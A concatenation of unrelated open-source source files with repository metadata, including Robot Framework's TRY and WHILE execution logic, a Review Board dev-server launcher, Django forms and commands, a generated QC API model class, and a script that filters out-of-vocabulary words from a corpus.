runner = BodyRunner(self._context, run=False, templated=self._templated)
runner.run(branch.body)
if not error_reported:
error_reported = True
raise ExecutionFailed(data.error)
raise ExecutionFailed(data.error)
def _run_try(self, data, run):
result = TryBranchResult(data.TRY)
return self._run_branch(data.try_branch, result, run)
def _should_run_excepts_or_else(self, error, run):
if not run:
return False
if not error:
return True
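# Skips and PASS-style exits must propagate as-is, so EXCEPT/ELSE branches are not run for them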
return not (error.skip or isinstance(error, ExecutionPassed))
def _run_branch(self, branch, result, run=True, error=None):
try:
with StatusReporter(branch, result, self._context, run):
if error:
raise error
runner = BodyRunner(self._context, run, self._templated)
runner.run(branch.body)
except ExecutionStatus as err:
if isinstance(err, ExecutionFailed) and err.syntax:
raise err
return err
else:
return None
def _run_excepts(self, data, error, run):
for branch in data.except_branches:
try:
run_branch = run and self._should_run_except(branch, error)
except DataError as err:
run_branch = True
pattern_error = err
else:
pattern_error = None
result = TryBranchResult(branch.type, branch.patterns,
branch.pattern_type, branch.variable)
if run_branch:
if branch.variable:
self._context.variables[branch.variable] = str(error)
error = self._run_branch(branch, result, error=pattern_error)
run = False
else:
self._run_branch(branch, result, run=False)
return error
def _should_run_except(self, branch, error):
if not branch.patterns:
return True
matchers = {
'GLOB': lambda m, p: Matcher(p, spaceless=False, caseless=False).match(m),
'LITERAL': lambda m, p: m == p,
'REGEXP': lambda m, p: re.match(rf'{p}\Z', m) is not None,
'START': lambda m, p: m.startswith(p)
}
if branch.pattern_type:
pattern_type = self._context.variables.replace_string(branch.pattern_type)
else:
pattern_type = 'LITERAL'
matcher = matchers.get(pattern_type.upper())
if not matcher:
raise DataError(f"Invalid EXCEPT pattern type '{pattern_type}', "
f"expected {seq2str(matchers, lastsep=' or ')}.")
for pattern in branch.patterns:
if matcher(error.message, self._context.variables.replace_string(pattern)):
return True
return False
def _run_else(self, data, run):
if data.else_branch:
result = TryBranchResult(data.ELSE)
return self._run_branch(data.else_branch, result, run)
def _run_finally(self, data, run):
if data.finally_branch:
result = TryBranchResult(data.FINALLY)
try:
with StatusReporter(data.finally_branch, result, self._context, run):
runner = BodyRunner(self._context, run, self._templated)
runner.run(data.finally_branch.body)
except ExecutionStatus as err:
return err
else:
return None
class WhileLimit:
is_valid = True
@classmethod
def create(cls, limit, variables):
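"""Parse the WHILE 'limit' value: empty -> the default iteration cap, 'NONE' -> no limit, an integer string -> an iteration cap, anything else -> a time limit parsed with timestr_to_secs."""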
try:
if not limit:
return IterationCountLimit(DEFAULT_WHILE_LIMIT)
if limit.upper() == 'NONE':
return NoLimit()
value = variables.replace_string(limit)
try:
count = int(value.replace(' ', ''))
if count <= 0:
return InvalidLimit(f"Iteration limit must be a positive integer, "
f"got: '{count}'.")
return IterationCountLimit(count)
except ValueError:
return DurationLimit(timestr_to_secs(value))
except Exception as error:
return InvalidLimit(error)
def limit_exceeded(self):
raise ExecutionFailed(f"WHILE loop was aborted because it did not finish within the "
f"limit of {self}. Use the 'limit' argument to increase or "
f"remove the limit if needed.")
def __enter__(self):
raise NotImplementedError
def __exit__(self, exc_type, exc_val, exc_tb):
return None
class DurationLimit(WhileLimit):
def __init__(self, max_time):
self.max_time = max_time
self.start_time = None
def __enter__(self):
if not self.start_time:
self.start_time = time.time()
if time.time() - self.start_time > self.max_time:
self.limit_exceeded()
def __str__(self):
return f'{self.max_time} seconds'
class IterationCountLimit(WhileLimit):
def __init__(self, max_iterations):
self.max_iterations = max_iterations
self.current_iterations = 0
def __enter__(self):
if self.current_iterations >= self.max_iterations:
self.limit_exceeded()
self.current_iterations += 1
def __str__(self):
return f'{self.max_iterations} iterations'
class NoLimit(WhileLimit):
def __enter__(self):
pass
class InvalidLimit(WhileLimit):
is_valid = False
def __init__(self, reason):
self.reason = f'Invalid WHILE loop limit: {reason}'
def __enter__(self):
raise DataError(self.reason)
| {
"content_hash": "1ec2f5720c1eb8e8341040aaf1f8acf8",
"timestamp": "",
"source": "github",
"line_count": 648,
"max_line_length": 93,
"avg_line_length": 37.09567901234568,
"alnum_prop": 0.5593643397953241,
"repo_name": "HelioGuilherme66/robotframework",
"id": "9a0d077df789a7c47ccb72486989c708d3aa3857",
"size": "24682",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/robot/running/bodyrunner.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "44706"
},
{
"name": "HTML",
"bytes": "86409"
},
{
"name": "JavaScript",
"bytes": "162950"
},
{
"name": "Python",
"bytes": "2671114"
},
{
"name": "RobotFramework",
"bytes": "1231105"
}
],
"symlink_target": ""
} |
import getopt
import os
import sys
DEFAULT_HOST = "0.0.0.0"
DEFAULT_PORT = "8080"
def usage():
print("usage: %s options" % sys.argv[0])
print()
print("OPTIONS:")
print(" -h Show this message")
print(" -H HOST Set server host (defaults to %s)" % DEFAULT_HOST)
print(" -p PORT Set server port (defaults to %s)" % DEFAULT_PORT)
def main():
# Assign default settings
server_host = DEFAULT_HOST
server_port = DEFAULT_PORT
# Do any command-line argument processing
(opts, args) = getopt.getopt(sys.argv[1:], 'hH:p:')
for opt, arg in opts:
if opt == '-h':
usage()
sys.exit(1)
elif opt == '-p':
server_port = arg
elif opt == '-H':
server_host = arg
else:
usage()
sys.exit(1)
# Ensure we're at the top-level Review Board directory
if not os.path.exists(os.path.join('reviewboard', 'manage.py')):
sys.stderr.write('This must be run from the top-level Review Board'
' directory\n')
sys.exit(1)
# Next, ensure settings_local.py exists where we expect it
if not os.path.exists('settings_local.py'):
sys.stderr.write('You must create a settings_local.py in the '
'top-level source \n'
'directory. You can use '
'contrib/conf/settings_local.py.tmpl\n'
'as a basis.\n')
sys.exit(1)
# Build ReviewBoard.egg-info if it doesn't already exist
if not os.path.exists('ReviewBoard.egg-info'):
os.system('%s ./setup.py egg_info'
% sys.executable)
# And now just boot up the server
os.system('%s -Wd ./reviewboard/manage.py runserver %s:%s --nostatic'
% (sys.executable, server_host, server_port))
if __name__ == "__main__":
main()
| {
"content_hash": "cbb1b1325d0d192dea753b2d4348e9be",
"timestamp": "",
"source": "github",
"line_count": 64,
"max_line_length": 76,
"avg_line_length": 30.1875,
"alnum_prop": 0.5450310559006211,
"repo_name": "reviewboard/reviewboard",
"id": "e9dec6c0f4b431737777e7624a0f0ca6863fa1e5",
"size": "1956",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "contrib/internal/devserver.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "10167"
},
{
"name": "Dockerfile",
"bytes": "7721"
},
{
"name": "HTML",
"bytes": "226489"
},
{
"name": "JavaScript",
"bytes": "3991608"
},
{
"name": "Less",
"bytes": "438017"
},
{
"name": "Python",
"bytes": "9186415"
},
{
"name": "Shell",
"bytes": "3855"
}
],
"symlink_target": ""
} |
from .cli import main
main()
| {
"content_hash": "2abe3982d3558a845ef8bfa26ca357cd",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 21,
"avg_line_length": 9.666666666666666,
"alnum_prop": 0.7241379310344828,
"repo_name": "avanov/solo",
"id": "c49f9df415fcc05442d953e006fd17c1c03432de",
"size": "29",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "solo/__main__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "273"
},
{
"name": "Mako",
"bytes": "494"
},
{
"name": "Python",
"bytes": "162984"
},
{
"name": "RAML",
"bytes": "903"
}
],
"symlink_target": ""
} |
from django import forms
from backend.models import Praise
class PraiseForm(forms.ModelForm):
class Meta:
# Provides an association between the model form and its model
model = Praise
exclude = ['user']
| {
"content_hash": "400e584abd9f9efb8a61ecbb426eec22",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 61,
"avg_line_length": 26,
"alnum_prop": 0.7644230769230769,
"repo_name": "SEACodeCarrots/PraiseReminder",
"id": "48b57f131e160d17d0ec5449991a7903ba9b55f9",
"size": "259",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "reviver/backend/forms.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "3931"
},
{
"name": "HTML",
"bytes": "6213"
},
{
"name": "JavaScript",
"bytes": "366"
},
{
"name": "Python",
"bytes": "11038"
}
],
"symlink_target": ""
} |
"""
A setuptools file for the pyworkout-toolkit
"""
from setuptools import setup, find_packages
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='pyworkout-toolkit',
version='0.0.22',
description='Python tools to process workout data and telemetry',
long_description=long_description,
url='https://github.com/triskadecaepyon/pyworkout-toolkit/',
maintainer='David Liu',
maintainer_email='[email protected]',
license='BSD',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Topic :: Scientific/Engineering',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Operating System :: Microsoft :: Windows',
'Operating System :: POSIX',
'Operating System :: Unix',
'Operating System :: MacOS',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
keywords='workout data telemetry',
packages=find_packages(exclude=['contrib', 'docs', 'tests']),
install_requires=['numpy', 'pandas', 'lxml'],
)
| {
"content_hash": "55f93417430c1e512b60808732e6da62",
"timestamp": "",
"source": "github",
"line_count": 51,
"max_line_length": 69,
"avg_line_length": 27.098039215686274,
"alnum_prop": 0.6316931982633864,
"repo_name": "triskadecaepyon/pyworkout-toolkit",
"id": "14ae4e5cf3946b388874d7c5feef346c5948ddd7",
"size": "1405",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "36"
},
{
"name": "Python",
"bytes": "7753"
},
{
"name": "Shell",
"bytes": "35"
}
],
"symlink_target": ""
} |
class UnknownColumnNameException(Exception):
"""Exception type raised when encountering an unknown column name."""
def __init__(self, column_name):
self.column_name = column_name
def __str__(self):
return repr(self.column_name)
def SerializeProfiles(profiles):
"""Returns a serialized string for the given |profiles|.
|profiles| should be a list of (field_type, value) string pairs.
"""
lines = []
for profile in profiles:
# Include a fixed string to separate profiles.
lines.append("---")
for (field_type, value) in profile:
if field_type == "ignored":
continue
lines.append("%s:%s%s" % (field_type, (' ' if value else ''), value))
return '\n'.join(lines)
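# Example (hypothetical profiles; a field with an empty value gets no space after the colon):
#   SerializeProfiles([[('NAME_FIRST', 'Jane')], [('NAME_FULL', '')]])
#   returns '---\nNAME_FIRST: Jane\n---\nNAME_FULL:'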
def ColumnNameToFieldType(column_name):
"""Converts the given |column_name| to the corresponding AutofillField type.
|column_name| should be a string drawn from the column names of the
autofill_profiles table in the Chromium "Web Data" database.
"""
column_name = column_name.lower()
field_type = "unknown"
if column_name in ["guid", "label", "country", "date_modified", "origin",
"language_code", "use_count", "use_date", "sorting_code",
"dependent_locality"]:
field_type = "ignored"
elif column_name == "first_name":
field_type = "NAME_FIRST"
elif column_name == "middle_name":
field_type = "NAME_MIDDLE"
elif column_name == "last_name":
field_type = "NAME_LAST"
elif column_name == "full_name":
field_type = "NAME_FULL"
elif column_name == "email":
field_type = "EMAIL_ADDRESS"
elif column_name == "company_name":
field_type = "COMPANY_NAME"
elif column_name == "address_line_1":
field_type = "ADDRESS_HOME_LINE1"
elif column_name == "address_line_2":
field_type = "ADDRESS_HOME_LINE2"
elif column_name == "street_address":
field_type = "ADDRESS_HOME_STREET_ADDRESS"
elif column_name == "city":
field_type = "ADDRESS_HOME_CITY"
elif column_name == "state":
field_type = "ADDRESS_HOME_STATE"
elif column_name == "zipcode":
field_type = "ADDRESS_HOME_ZIP"
elif column_name == "country_code":
field_type = "ADDRESS_HOME_COUNTRY"
elif column_name == "phone":
field_type = "PHONE_HOME_WHOLE_NUMBER"
else:
raise UnknownColumnNameException(column_name)
return field_type
| {
"content_hash": "e4580ee1d8f74dc1300767a059e15961",
"timestamp": "",
"source": "github",
"line_count": 74,
"max_line_length": 78,
"avg_line_length": 31.324324324324323,
"alnum_prop": 0.6591889559965487,
"repo_name": "chromium/chromium",
"id": "94eeca6cb4051d9f81df14b64afcbfdde9eb8ca6",
"size": "2460",
"binary": false,
"copies": "7",
"ref": "refs/heads/main",
"path": "components/test/data/autofill/merge/tools/autofill_merge_common.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
} |
from django.core.management.base import BaseCommand
from directory.models import Researches, ParaclinicInputGroups, ParaclinicInputField
import json
from appconf.manager import SettingManager
class Command(BaseCommand):
def add_arguments(self, parser):
parser.add_argument('research_pk', type=int)
def handle(self, *args, **kwargs):
research_pk = kwargs["research_pk"]
research_data = {}
r = Researches.objects.get(pk=research_pk)
research_data['title'] = r.title
research_data['code'] = r.code
research_data['short_title'] = r.short_title
groups = ParaclinicInputGroups.objects.filter(research=r)
groups_to_save = []
for group in groups:
fields_in_group = []
for f in ParaclinicInputField.objects.filter(group=group, hide=False):
field_data = {
'title': f.title,
'short_title': f.short_title,
'order': f.order,
'default_value': f.default_value,
'lines': f.lines,
'field_type': f.field_type,
'for_extract_card': f.for_extract_card,
'for_talon': f.for_talon,
'helper': f.helper,
'input_templates': f.input_templates,
'required': f.required,
'hide': f.hide,
}
fields_in_group.append(field_data)
groups_to_save.append(
{
'title': group.title,
'show_title': group.show_title,
'order': group.order,
'hide': group.hide,
'paraclinic_input_field': fields_in_group,
'fieldsInline': group.fields_inline,
}
)
research_data['paraclinic_input_groups'] = groups_to_save
dir_tmp = SettingManager.get("dir_param")
with open(f'{dir_tmp}/{research_pk}.json', 'w') as fp:
json.dump(research_data, fp)
| {
"content_hash": "d1a5908d04ff2f8a5a13d3b0a7487c72",
"timestamp": "",
"source": "github",
"line_count": 51,
"max_line_length": 84,
"avg_line_length": 41.11764705882353,
"alnum_prop": 0.5231282784930854,
"repo_name": "moodpulse/l2",
"id": "15825919a3d6c517fbe54669655b43bee1c6d562",
"size": "2097",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "users/management/commands/export_research.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "38747"
},
{
"name": "Dockerfile",
"bytes": "146"
},
{
"name": "HTML",
"bytes": "238498"
},
{
"name": "JavaScript",
"bytes": "425946"
},
{
"name": "Makefile",
"bytes": "1515"
},
{
"name": "Python",
"bytes": "3710422"
},
{
"name": "SCSS",
"bytes": "48493"
},
{
"name": "Shell",
"bytes": "1815"
},
{
"name": "TypeScript",
"bytes": "98237"
},
{
"name": "Vue",
"bytes": "1980612"
}
],
"symlink_target": ""
} |
"""
Qc API
Qc API # noqa: E501
The version of the OpenAPI document: 3.0.0
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from telestream_cloud_qc.configuration import Configuration
class SingleColorTest(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'max_time_allowed': 'float',
'time_secs_or_frames': 'SecsOrFramesType',
'percentage_of_frame': 'float',
'ignore_below': 'int',
'reject_on_error': 'bool',
'checked': 'bool'
}
attribute_map = {
'max_time_allowed': 'max_time_allowed',
'time_secs_or_frames': 'time_secs_or_frames',
'percentage_of_frame': 'percentage_of_frame',
'ignore_below': 'ignore_below',
'reject_on_error': 'reject_on_error',
'checked': 'checked'
}
def __init__(self, max_time_allowed=None, time_secs_or_frames=None, percentage_of_frame=None, ignore_below=None, reject_on_error=None, checked=None, local_vars_configuration=None): # noqa: E501
"""SingleColorTest - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._max_time_allowed = None
self._time_secs_or_frames = None
self._percentage_of_frame = None
self._ignore_below = None
self._reject_on_error = None
self._checked = None
self.discriminator = None
if max_time_allowed is not None:
self.max_time_allowed = max_time_allowed
if time_secs_or_frames is not None:
self.time_secs_or_frames = time_secs_or_frames
if percentage_of_frame is not None:
self.percentage_of_frame = percentage_of_frame
if ignore_below is not None:
self.ignore_below = ignore_below
if reject_on_error is not None:
self.reject_on_error = reject_on_error
if checked is not None:
self.checked = checked
@property
def max_time_allowed(self):
"""Gets the max_time_allowed of this SingleColorTest. # noqa: E501
:return: The max_time_allowed of this SingleColorTest. # noqa: E501
:rtype: float
"""
return self._max_time_allowed
@max_time_allowed.setter
def max_time_allowed(self, max_time_allowed):
"""Sets the max_time_allowed of this SingleColorTest.
:param max_time_allowed: The max_time_allowed of this SingleColorTest. # noqa: E501
:type: float
"""
self._max_time_allowed = max_time_allowed
@property
def time_secs_or_frames(self):
"""Gets the time_secs_or_frames of this SingleColorTest. # noqa: E501
:return: The time_secs_or_frames of this SingleColorTest. # noqa: E501
:rtype: SecsOrFramesType
"""
return self._time_secs_or_frames
@time_secs_or_frames.setter
def time_secs_or_frames(self, time_secs_or_frames):
"""Sets the time_secs_or_frames of this SingleColorTest.
:param time_secs_or_frames: The time_secs_or_frames of this SingleColorTest. # noqa: E501
:type: SecsOrFramesType
"""
self._time_secs_or_frames = time_secs_or_frames
@property
def percentage_of_frame(self):
"""Gets the percentage_of_frame of this SingleColorTest. # noqa: E501
:return: The percentage_of_frame of this SingleColorTest. # noqa: E501
:rtype: float
"""
return self._percentage_of_frame
@percentage_of_frame.setter
def percentage_of_frame(self, percentage_of_frame):
"""Sets the percentage_of_frame of this SingleColorTest.
:param percentage_of_frame: The percentage_of_frame of this SingleColorTest. # noqa: E501
:type: float
"""
self._percentage_of_frame = percentage_of_frame
@property
def ignore_below(self):
"""Gets the ignore_below of this SingleColorTest. # noqa: E501
:return: The ignore_below of this SingleColorTest. # noqa: E501
:rtype: int
"""
return self._ignore_below
@ignore_below.setter
def ignore_below(self, ignore_below):
"""Sets the ignore_below of this SingleColorTest.
:param ignore_below: The ignore_below of this SingleColorTest. # noqa: E501
:type: int
"""
self._ignore_below = ignore_below
@property
def reject_on_error(self):
"""Gets the reject_on_error of this SingleColorTest. # noqa: E501
:return: The reject_on_error of this SingleColorTest. # noqa: E501
:rtype: bool
"""
return self._reject_on_error
@reject_on_error.setter
def reject_on_error(self, reject_on_error):
"""Sets the reject_on_error of this SingleColorTest.
:param reject_on_error: The reject_on_error of this SingleColorTest. # noqa: E501
:type: bool
"""
self._reject_on_error = reject_on_error
@property
def checked(self):
"""Gets the checked of this SingleColorTest. # noqa: E501
:return: The checked of this SingleColorTest. # noqa: E501
:rtype: bool
"""
return self._checked
@checked.setter
def checked(self, checked):
"""Sets the checked of this SingleColorTest.
:param checked: The checked of this SingleColorTest. # noqa: E501
:type: bool
"""
self._checked = checked
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, SingleColorTest):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, SingleColorTest):
return True
return self.to_dict() != other.to_dict()
| {
"content_hash": "b4f43ab084e392459bb2e0469f2b0c98",
"timestamp": "",
"source": "github",
"line_count": 249,
"max_line_length": 198,
"avg_line_length": 30.076305220883533,
"alnum_prop": 0.5908666043530512,
"repo_name": "Telestream/telestream-cloud-python-sdk",
"id": "8ca88d9bc6c36a04e0cbb047ef8c435aa7067f4e",
"size": "7506",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "telestream_cloud_qc_sdk/telestream_cloud_qc/models/single_color_test.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1339719"
},
{
"name": "Shell",
"bytes": "6712"
}
],
"symlink_target": ""
} |
"""
Eric Nordstrom
Python 3.6.0
4/29/17
Removes out-of-vocabulary (OOV) words, a.k.a. "mixed words", from the provided series of
tokens. Words are deemed OOV when they are not found in either provided language dictionary.
Results are stored in .TXT file(s) specified by the user. PyDictionary option available for
English dictionary (requires PyDictionary module and reliable internet connection).
Example command line input:
C:\Users\Me\Research\Files>..\Scripts\OOVs.py "Tokenized Corpus.txt" SpnDict . -d1 utf8
Interpretation:
..\Scripts\OOVs.py Call OOVs.py from separate directory
"Tokenized Corpus.txt" Corpus tokens data (quotes to avoid parsing argument)
SpnDict Spanish dictionary (".txt" assumed)
. PyDictionary option chosen for English dictionary
-d1 Spanish dictionary encoding type argument called
utf8 Spanish dictionary encoding type specification
"""
def PyDict(): #for default D2 argument in OOV_remove
'''Returns PyDictionary object'''
from PyDictionary import PyDictionary
return PyDictionary()
def OOV_remove( tokens, D1, D2=None ):
'''Removes OOVs from tokens list based on two dictionaries. PyDictionary module used for Dictionary 2 when none is supplied.'''
import string
if D2 is None:
D2 = PyDict() #deferred default so PyDictionary (and an internet connection) is only needed when D2 is omitted
if type( D2 ) in { set, list, tuple, dict }:
def condition3( word, D2 ): #condition for IF statement in FOR loop
return word not in D2
else: #assume PyDictionary
def condition3( word, D2 ):
return D2.meaning( word ) == None #This line would print to the console on each OOV if the STDOUT were not changed.
import sys, os
orig_stdout = sys.stdout #to save for later
sys.stdout = open( os.devnull, 'w' ) #prevents printing to console during PyDictionary usage
t = list( tokens ) #to become output tokens LIST with OOVs removed
OOVs = {} #to become DICT containing removed OOVs hashed with their original indices in TOKENS
d = 0 #index offset to account for already removed OOV words
for i in range( 0, len(tokens) ):
word = tokens[i]
if word not in string.punctuation and word not in D1 and condition3( word, D2 ):
OOVs.update({ i+1 : word }) #can remove "+1" after "i" on this line if zero-indexing desired.
del t[i-d]
d += 1
if type( D2 ) not in { set, list, tuple, dict }:
sys.stdout = orig_stdout #restore stdout
return ( t, OOVs )
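# A small illustrative sketch (defined but not called at import time): with
# plain set dictionaries, OOV_remove drops any token absent from both sets and
# reports the removed words keyed by their 1-based positions. The token values
# below are made up purely for illustration.
def _OOV_remove_demo():
    english = {'the', 'sat'}
    spanish = {'el', 'gato'}
    kept, oovs = OOV_remove( ['the', 'gato', 'sat', '.'], english, spanish )
    assert kept == ['the', 'gato', 'sat', '.'] and oovs == {}  #punctuation and in-vocabulary words kept
    kept, oovs = OOV_remove( ['the', 'blorp', 'sat'], english, spanish )
    assert kept == ['the', 'sat'] and oovs == { 2: 'blorp' }   #'blorp' is in neither dictionary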
def gettxt( file_name, encoding_type=None ):
    '''Reads and splits .TXT files. Appends ".txt" to file name if necessary.'''
    name = file_name
    if name[-4:] != ".txt":
        name += ".txt"
    with open( name, encoding=encoding_type ) as f: #context manager so the handle is closed after reading
        return f.read().split() #LIST type
def get_answer(prompt, accepted_answers, answer_type = str):
    '''Loops until input matches an accepted answer (case-insensitive)'''
    answer = None
    while answer is None or answer.lower() not in accepted_answers:
        answer = answer_type( input( prompt ) )
        if answer.lower() not in accepted_answers:
            print( '"%s" is not an accepted response.' % str( answer ) )
    return answer
def destwrite( words, help_message ):
'''User interface for writing to .TXT files. Does not return anything.'''
destname = input( '\nInput destination .TXT file name ("\\H" for help): ' )
h = True
if destname.lower() == "\\h":
print( help_message )
destname = input( "\nInput destination .TXT file name: " )
h = False
option = 'n'
sep = False #used for "append" case
    while option in { 'c', 'n', '\\h' }: #determine how to open file; the help option re-prompts for a name, so it loops too
if destname[-4:] != ".txt":
destname += ".txt"
        try: #User should preferably type a file name that does not already exist, in which case this block is not necessary.
            dest = open( destname, 'r' )
            dest.close() #existence probe only; the file is reopened below in whichever mode the user chooses
            print( "\nFile by that name already exists." )
prompt = 'Options:\n\t"O" - overwrite contents\n\t"A" - append to contents\n\t"C" - create new file with "(1)" appended to name\n\t"N" - enter new name\n\t[ctrl]+[C] - exit\n\nInput: '
            accepted_answers = { 'o', 'a', 'c', 'n', '\\h' }
option = get_answer( prompt, accepted_answers ).lower()
if option == 'o':
print( '\nOverwriting "%s".' % destname )
dest = open( destname, 'w' )
elif option == 'a':
print( '\nAppending to "%s".' % destname )
dest = open( destname, 'a' )
sep = True
elif option == 'c':
destname = destname[:-4] + " (1)"
elif option == 'n':
destname = input( "\nInput destination .TXT file name%s: " % ( ' ("\\H" for help)' * h ) )
else:
print( help_message )
destname = input( "\nInput destination .TXT file name: " )
h = False
except FileNotFoundError: #Preferred block
option = '' #to exit WHILE loop
print( '\nCreating and writing to new file "%s".' % destname )
dest = open( destname, 'w' )
dest.write( "\n"*9*sep ) #for "append" case
for i in words:
dest.write( str( i ) )
if type( words ) == dict: #OOVs
dest.write( " : " + words[i] )
dest.write( "\n" )
dest.close()
print( "Writing complete. File saved." )
def main():
import argparse
parser = argparse.ArgumentParser( description = 'Locate, remove, and record out-of-vocabulary (OOV) words, a.k.a. "mixed words"' )
parser.add_argument( "TOKENS", help="Name of the .TXT file containing corpus tokens." )
parser.add_argument( "D1", help="Name of the language 1 dictionary .TXT file" )
parser.add_argument( "D2", help='Name of the language 2 dictionary .TXT file. Enter "." for PyDictionary (requires PyDictionary module and reliable internet connection). NOTE: PyDictionary only for English; English dictionary must be D2 if using PyDictionary.' )
parser.add_argument( "-t", "--TOKENS_encoding", help="Tokens .TXT file encoding type. Default used if not specified." )
parser.add_argument( "-d1", "--D1_encoding", help="Language 1 dictionary .TXT file encoding type. Default used if not specified." )
parser.add_argument( "-d2", "--D2_encoding", help="Language 2 dictionary .TXT file encoding type. Default used if not specified." )
parser.add_argument( "-cd", "--change_directory", help='Change the folder in which to locate .TXT files. NOTE: It is also possible to specify individual file locations by including the entire path starting from "C:\".' )
args = parser.parse_args()
if args.change_directory:
import os
os.chdir( args.change_directory )
tokens = gettxt( args.TOKENS, args.TOKENS_encoding )
D1 = gettxt( args.D1, args.D1_encoding )
if args.D2 == ".":
if args.D2_encoding:
raise RuntimeError( "Both PyDictionary option and encoding type specified for D2." )
D2 = PyDict()
else:
D2 = gettxt( args.D2, args.D2_encoding )
print( "\nRemoving OOVs...\n" )
( tokens_without_OOVs, OOVs ) = OOV_remove( tokens, D1, D2 )
print( "\nOOVs removed.\n" )
help_message = '\nDestination .TXT file used to store tokens list after removing out-of-vocabulary (OOV) words, a.k.a. "mixed words". If destination file to be outside of current working directory, include file location path in name.'
destwrite( tokens_without_OOVs, help_message )
prompt = "\nWrite removed OOVs to .TXT file? (Y/N): "
accepted_answers = { 'y', 'n' }
keep_OOVs = get_answer( prompt, accepted_answers )
if keep_OOVs.lower() == 'y':
help_message = '\nDestination .TXT file used to store removed out-of-vocabulary (OOV) words, a.k.a. "mixed words", and their corresponding locations in the original tokens list. If destination file to be outside of current working directory, include file location path in name.'
destwrite( OOVs, help_message )
print( "\nDone." )
if __name__ == "__main__":
main()
'''OpenGL extension APPLE.framebuffer_multisample
This module customises the behaviour of the
OpenGL.raw.GLES1.APPLE.framebuffer_multisample to provide a more
Python-friendly API
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/APPLE/framebuffer_multisample.txt
'''
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES1 import _types, _glgets
from OpenGL.raw.GLES1.APPLE.framebuffer_multisample import *
from OpenGL.raw.GLES1.APPLE.framebuffer_multisample import _EXTENSION_NAME
def glInitFramebufferMultisampleAPPLE():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
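# A minimal, hedged usage sketch: the extension query is only meaningful once
# a GLES1 rendering context is current, so context creation (via whatever
# windowing toolkit the application uses) is assumed here rather than shown.
def _multisample_available():
    '''Return True if APPLE_framebuffer_multisample can be used in the current context.'''
    return bool( glInitFramebufferMultisampleAPPLE() )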
"content_hash": "f155ec6b5702d39deed13058a172338c",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 74,
"avg_line_length": 36.26086956521739,
"alnum_prop": 0.8105515587529976,
"repo_name": "alexus37/AugmentedRealityChess",
"id": "459873a85b542cb934628a46b18b956f6579b86a",
"size": "834",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "pythonAnimations/pyOpenGLChess/engineDirectory/oglc-env/lib/python2.7/site-packages/OpenGL/GLES1/APPLE/framebuffer_multisample.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "158062"
},
{
"name": "C++",
"bytes": "267993"
},
{
"name": "CMake",
"bytes": "11319"
},
{
"name": "Fortran",
"bytes": "3707"
},
{
"name": "Makefile",
"bytes": "14618"
},
{
"name": "Python",
"bytes": "12813086"
},
{
"name": "Roff",
"bytes": "3310"
},
{
"name": "Shell",
"bytes": "3855"
}
],
"symlink_target": ""
} |
import json
import datetime
from djangocms_text_ckeditor.cms_plugins import TextPlugin
from djangocms_text_ckeditor.models import Text
from django.contrib import admin
from django.contrib.admin.models import LogEntry
from django.contrib.admin.sites import site, AdminSite
from django.contrib.auth import get_user_model
from django.contrib.auth.models import Permission, AnonymousUser
from django.contrib.sites.models import Site
from django.core.urlresolvers import reverse
from django.http import (Http404, HttpResponseBadRequest, HttpResponseForbidden, HttpResponse,
QueryDict, HttpResponseNotFound)
from django.utils.encoding import force_text, smart_str
from django.utils import timezone
